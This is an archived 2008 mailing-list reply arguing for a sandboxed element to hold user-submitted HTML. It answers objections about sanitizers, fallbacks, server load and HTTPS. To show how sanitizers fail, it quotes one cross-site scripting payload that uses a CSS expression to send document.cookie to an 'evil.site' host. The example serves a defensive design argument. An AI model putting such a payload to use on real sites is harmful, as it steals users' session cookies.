- From: Frode Børli <frode@seria.no>
- Date: Tue, 17 Jun 2008 20:33:33 +0200
> 1. Please elaborate how an extension of CSS would require a sanitizer > update. In the year 1998: A sanitizer algorithm works perfectly for all existing methods of adding scripts. It uses a white list, which allows only certain tags and attributes. Among the allowed attributes is colspan, rowspan and style - since the web developer wants users to be able to build tables and style them properly. In the year 1999 Internet Explorer 5.0 is introduced, and it introduces a new invention; CSS-expressions. Suddenly the formerly secure webapplication is no longer secure. A user adds the following code, and it passes the sanitizer easily: <span style='color: blue; width: expression(document.write("<img src=http://evil.site/"+document.cookie));'></span> I am absolutely certain that there will be other, brilliant inventions in the future which will break sanitizers - ofcourse we can't know which inventions today - but the sandboxing means that browser vendors in the future can prevent the above scenario. > 2. Please explain why using a dedicated tag with double parsing is easier > for a Web developer than putting the code in an attribute. 1. The code will still work in Dreamwaver and similar tools. 2. It is not a totally new way of doing things (we already escape content that are put into <textarea> in the exact same way as I suggest we put content into the sandbox). Putting a 100 KB piece of user submitted content into an attribute will feel weird - and perhaps even break current parsers. 3. Web developers do not have to create seperate scripts to cater for HTML 4 browser (so that the <iframe src=> fallback will work). 4. Web developers do not have to create two separate websites (on different domains) that use the same database to make sure that cross site scripting can't happen from the iframe to the parent document. If the web developer simply place a separate script on the same host - then the fallback will have no security at all. 5. The fallback requires the web developer to know the visible size of the content in advance. HTML 4 browsers do not support any methods of resizing the <iframe> according to the content, when the content of the iframe is from a different domain. > 3. Your quoting solution would not cause legacy browsers to show plain > text; they would show HTML code, which is probably much worse than showing > plain text. If you mean JavaScript can be used to extract plain text, I > doubt it will be simple; there are probably lots of junctions where this > procedure can derail. I am pretty sure that including a small script similar to this into the main document will make the content very readable, although plain text: <script> var els = document.getElementsByTagName("DATA"); for(e in els) els[e].innerHTML = els[e].innerHTML.replace(/<[^>]*>/g, "").replace(/\n/g,"<br>"); </script> I can guarantee you that a few hours work I have a very good script that does this very well. > 4. Please explain why you consider network efficiency for legacy user > agents essential. I believe that the correlation between efficiency and > compatibility is negative in general. It is not the network efficiency for the user agens I am worried about - it is the server side of things that will be the problem. If the server has to do handle 20 separate dynamic requests just to display a single page view then that is unacceptable - and the method will never be used by bigger websites simply because it is not scalable. In fact, it would have already been done if it was a viable option. Please consider my answer to your question number two as well. > If that causes server overload, the > server can discriminate content depending on the user agent; this is a > temporary solution to an edge case and it should probably be acceptable. That is unacceptable. Major websites must accommodate at least 98 % of its user base at any time, and to promote user agent checking on the server side is a major issue for me, and most likely for most other web developers that work on a per project basis. It would require me to review already launched sites regularly and is hardly efficient use of my labour. > Besides, a blog page with 60 comments on it is rather hard to render and > read so you should probably consider other display options in this case. I am extremely against making assumptions such as "a blog page with 60 comments on is rather hard to read" so it will never be a problem. I prefer scrolling before clicking "next page" any time. If there is a choice to display 100 comments instead of 10 then I select 100 comments. Also user generated content might be single line comments, or even just a list of single words. > 5. I am not sure why IFRAME content must be HTTP-secured if the containing > page is. The specification does not impose such a restriction AFAIK. And, > if you need to go secure, do not allow scribbling in the first place, right? 1. An insecure iframe in a secure document will give you security warnings from the browser (There are insecure elements on this page, do you want to display them?). 2. Mixing secure and insecure communications makes having the secure channel pointless. 3. It is extremely dangerous to assume that nobody in the future will ever need to have secure communications with user generated content. Best regards, Frode B?rli - Seria.no
Received on Tuesday, 17 June 2008 11:33:33 UTC